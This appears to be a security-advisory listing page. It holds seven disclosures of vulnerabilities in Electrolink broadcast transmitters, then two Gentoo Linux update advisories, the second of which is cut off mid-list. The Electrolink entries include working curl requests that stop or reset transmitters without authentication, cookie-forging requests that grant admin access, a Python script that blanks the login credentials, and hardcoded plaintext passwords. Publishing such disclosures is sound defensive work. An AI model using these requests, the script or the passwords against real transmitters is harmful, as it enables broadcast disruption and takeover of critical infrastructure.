Electrolink FM/DAB/TV Transmitter from a denial of service scenario. An unauthenticated attacker can reset the board as well as stop the transmitter operations by sending one GET request to the command.cgi gateway.

    Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoSVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The transmitter is suffering from a Denial of Service (DoS)scenario. An unauthenticated attacker can reset the board as wellas stop the transmitter operations by sending one GET request tothe command.cgi gateway.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5795Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php30.06.2023--C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)Success! OKC:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)Success! OKC:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)Success! OK

Electrolink FM/DAB/TV Transmitter Unauthenticated Remote Denial Of Service

Electrolink FM/DAB/TV Transmitter allows an unauthenticated attacker to bypass authentication and modify the Cookie to reveal hidden pages that allows more critical operations to the transmitter.

    Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden FunctionalityVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device allows an unauthenticated attacker to bypassauthentication and modify the Cookie to reveal hidden pagesthat allows more critical operations to the transmitter.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5794Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5794.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/home.htm" | findstr /spina:d "admin"33:<a class="linkm admin" href="/setting.htm">Setting & Status</a>34:<a class="linkm admin" href="/lan.htm">Setting lan</a>35:<a class="linkm admin" href="/snmp.htm">Setting snmp</a>36:<a class="linkm admin" href="/mail.htm">Setting e-mail</a>37:<a class="linkm admin" href="/login.htm">Setting login</a>38:<a class="linkm admin superadmin" href="/admin.htm">Setting admin</a>39:<a class="linkm admin superadmin" href="/terminal.htm">Terminal</a>...C:\>curl -s "http://192.168.150.77:8888/admin.htm" -H "Cookie: Login=ZSL"C:\>curl -s "http://192.168.150.77:8888/terminal.htm" -H "Cookie: Login=ZSL"

Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality

Electrolink FM/DAB/TV Transmitter suffers from a privilege escalation vulnerability. An attacker can escalate his privileges by poisoning the Cookie from GUEST to ADMIN to effectively become Administrator or poisoning to ZSL to become Super Administrator.

    Electrolink FM/DAB/TV Transmitter Vertical Privilege EscalationVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The application suffers from a privilege escalationvulnerability. An attacker can escalate his privileges bypoisoning the Cookie from GUEST to ADMIN to effectivelybecome Administrator or poisoning to ZSL to become SuperAdministrator.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5793Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5793.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/mail.htm" -H "Cookie: Login=ADMIN" #changed Login=GUEST

Electrolink FM/DAB/TV Transmitter Vertical Privilege Escalation

Electrolink FM/DAB/TV Transmitter suffers from an unauthenticated parameter manipulation that allows an attacker to set the credentials to blank giving her access to the admin panel. It is also vulnerable to account takeover and arbitrary password change.

    #!/usr/bin/env python### Electrolink FM/DAB/TV Transmitter Remote Authentication Removal### Vendor: Electrolink s.r.l.# Product web page: https://www.electrolink.com# Affected version: 10W, 100W, 250W, Compact DAB Transmitter#                   500W, 1kW, 2kW Medium DAB Transmitter#                   2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter#                   100W, 500W, 1kW, 2kW Compact FM Transmitter#                   3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter#                   15W - 40kW Digital FM Transmitter#                   BI, BIII VHF TV Transmitter#                   10W - 5kW UHF TV Transmitter#                   Web version: 01.09, 01.08, 01.07#                   Display version: 1.4, 1.2#                   Control unit version: 01.06, 01.04, 01.03#                   Firmware version: 2.1## Summary: Since 1990 Electrolink has been dealing with design and# manufacturing of advanced technologies for radio and television# broadcasting. The most comprehensive products range includes: FM# Transmitters, DAB Transmitters, TV Transmitters for analogue and# digital multistandard operation, Bandpass Filters (FM, DAB, ATV,# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial# switches, Manual patch panels, RF power meters, Rigid line and# accessories. A professional solution that meets broadcasters needs# from small community television or radio to big government networks.## Compact DAB Transmitters 10W, 100W and 250W models with 3.5"# touch-screen display and in-built state of the art DAB modulator,# EDI input and GPS receiver. All transmitters are equipped with a# state-of-the art DAB modulator with excellent performances,# self-protected and self-controlled amplifiers ensure trouble-free# non-stop operation.## 100W, 500W, 1kW and 2kW power range available on compact 2U and# 3U 19" frame. Built-in stereo coder, touch screen display and# efficient low noise air cooling system. Available models: 3kW,# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters# with fully broadband solid state amplifiers and an efficient# low-noise air cooling system.## FM digital modulator with excellent specifications, built-in# stereo and RDS coder. Digital deviation limiter together with# ASI and SDI inputs are available. These transmitters are ready# for ISOFREQUENCY networks.## Available for VHF BI and VHF BIII operation with robust desing# and user-friendly local and remote control. Multi-standard UHF# TV transmitters from 10W up to 5kW with efficient low noise air# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC# and ISDB-Tb available.## Desc: The application is vulnerable to an unauthenticated# parameter manipulation that allows an attacker to set the# credentials to blank giving her access to the admin panel.# Also vulnerable to account takeover and arbitrary password# change.## Tested on: Mbedthis-Appweb/12.5.0#            Mbedthis-Appweb/12.0.0### Vulnerability discovered by Neurogenesia# Macedonian Information Security Research & Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5792# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php### 30.06.2023##import datetimeimport requestsdt = datetime.datetime.now()dt = dt.strftime('%d.%m.%Y %H:%M:%S')nul = ''print('Starting transmitter exploit at', dt)ip = input('Enter transmitter ip: ')if 'http' not in ip:    ip = 'http://' + ipep = '/login.htm'url = ip + epsignature = {'Accept-Encoding' : 'gzip, deflate',             'Accept-Language' : 'ku-MK,en;q=0.1806',                  'User-Agent' : 'Broadcastso/B.B',                  'Connection' : 'keep-alive'             }# ----------------- Line breaker v0.17 -----------------postd = {    'adminuser' : nul,             'guestuser' : nul,         'adminpassword' : nul,         'guestpassword' : nul         }print('Removing security control...')r = requests.post(url, data = postd, headers = signature)if r.status_code == 200:    print('Done. Go and "Login".')else:    print('Error')exit(-4)

Electrolink FM/DAB/TV Transmitter Remote Authentication Removal

Electrolink FM/DAB/TV Transmitter suffers from an authentication bypass vulnerability affecting the Login Cookie. An attacker can set an arbitrary value except NO to the Login Cookie and have full system access.

    Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication BypassVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The transmitter is vulnerable to an authentication bypassvulnerability affecting the Login Cookie. An attacker can setan arbitrary value except 'NO' to the Login Cookie and havefull system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5791Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"

Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass

Electrolink FM/DAB/TV Transmitter suffers from a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access.

    Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials DisclosureVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device is vulnerable to a disclosure of clear-textcredentials in controlloLogin.js that can allow securitybypass and system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5790Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"function verifica() {        var user = document.getElementById('user').value;        var password = document.getElementById('password').value;        //alert(user);        if(user=='admin' && password=='cozzir'){                SetCookie('Login','OK',exp);                window.location.replace("FrameSetCore.html");        }else{                SetCookie('Login','NO',exp);                window.location.replace("login.html");        }}

Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credential Disclosure

The Electrolink FM/DAB/TV Transmitter suffers from a disclosure of clear-text credentials in login.htm and mail.htm that can allow security bypass and system access.

    Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials DisclosureVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter                  500W, 1kW, 2kW Medium DAB Transmitter                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter                  100W, 500W, 1kW, 2kW Compact FM Transmitter                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter                  15W - 40kW Digital FM Transmitter                  BI, BIII VHF TV Transmitter                  10W - 5kW UHF TV Transmitter                  Web version: 01.09, 01.08, 01.07                  Display version: 1.4, 1.2                  Control unit version: 01.06, 01.04, 01.03                  Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device is vulnerable to a disclosure of clear-textcredentials in login.htm and mail.htm that can allow securitybypass and system access.Tested on: Mbedthis-Appweb/12.5.0           Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5789Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5789.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"55:<td class=cd31>Admin password</td>56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>63:<td class=cd31>Guest password</td>64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"93:<td class=cd31>Server password</td>94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>

Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credential Disclosure

Gentoo Linux Security Advisory 202310-1 - Multiple vulnerabilities have been discovered in ClamAV, the worst of which could result in remote code execution. Versions greater than or equal to 0.103.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: ClamAV: Multiple Vulnerabilities  
     Date: October 01, 2023  
     Bugs: #831083, #842813, #894672  
       ID: 202310-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in ClamAV, the worst of  
which could result in remote code execution.

Background  
==========

ClamAV is a GPL virus scanner.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
app-antivirus/clamav  < 0.103.7     >= 0.103.7

Description  
===========

Multiple vulnerabilities have been discovered in ClamAV. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All ClamAV users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.103.7"

References  
==========

[ 1 ] CVE-2022-20698  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20698  
[ 2 ] CVE-2022-20770  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20770  
[ 3 ] CVE-2022-20771  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20771  
[ 4 ] CVE-2022-20785  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20785  
[ 5 ] CVE-2022-20792  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20792  
[ 6 ] CVE-2022-20796  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20796  
[ 7 ] CVE-2022-20803  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20803  
[ 8 ] CVE-2023-20032  
      https://nvd.nist.gov/vuln/detail/CVE-2023-20032  
[ 9 ] CVE-2023-20052  
      https://nvd.nist.gov/vuln/detail/CVE-2023-20052

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-01

Gentoo Linux Security Advisory 202309-17 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions greater than or equal to 113.0.5672.126 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: September 30, 2023  
     Bugs: #893660, #904252, #904394, #904560, #905297, #905620, #905883, #906586  
       ID: 202309-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Chromium and its  
derivatives, the worst of which could result in remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web.

Google Chrome is one fast, simple, and secure browser for all your  
devices.

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable        Unaffected  
-------------------------  ----------------  -----------------  
www-client/chromium        < 113.0.5672.126  >= 113.0.5672.126  
www-client/chromium-bin    < 113.0.5672.126  Vulnerable!  
www-client/google-chrome   < 113.0.5672.126  >= 113.0.5672.126  
www-client/microsoft-edge  < 113.0.1774.50   >= 113.0.1774.50

Description  
===========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-113.0.5672.126"

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-113.0.5672.126"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-113.0.1774.50"

Gentoo has discontinued support for www-client/chromium-bin. Users  
should unmerge it in favor of the above alternatives:

  # emerge --ask --depclean --verbose "www-client/chromium-bin"

References  
==========

[ 1 ] CVE-2023-0696  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0696  
[ 2 ] CVE-2023-0697  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0697  
[ 3 ] CVE-2023-0698  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0698  
[ 4 ] CVE-2023-0699  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0699  
[ 5 ] CVE-2023-0700  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0700  
[ 6 ] CVE-2023-0701  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0701  
[ 7 ] CVE-2023-0702  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0702  
[ 8 ] CVE-2023-0703  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0703  
[ 9 ] CVE-2023-0704  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0704  
[ 10 ] CVE-2023-0705  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0705  
[ 11 ] CVE-2023-0927  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0927  
[ 12 ] CVE-2023-0928  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0928  
[ 13 ] CVE-2023-0929  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0929  
[ 14 ] CVE-2023-0930  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0930  
[ 15 ] CVE-2023-0931  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0931  
[ 16 ] CVE-2023-0932  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0932  
[ 17 ] CVE-2023-0933  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0933  
[ 18 ] CVE-2023-0941  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0941  
[ 19 ] CVE-2023-1528  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1528  
[ 20 ] CVE-2023-1529  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1529  
[ 21 ] CVE-2023-1530  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1530  
[ 22 ] CVE-2023-1531  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1531  
[ 23 ] CVE-2023-1532  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1532  
[ 24 ] CVE-2023-1533  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1533  
[ 25 ] CVE-2023-1534  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1534  
[ 26 ] CVE-2023-1810  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1810  
[ 27 ] CVE-2023-1811  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1811  
[ 28 ] CVE-2023-1812  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1812  
[ 29 ] CVE-2023-1813  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1813  
[ 30 ] CVE-2023-1814  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1814  
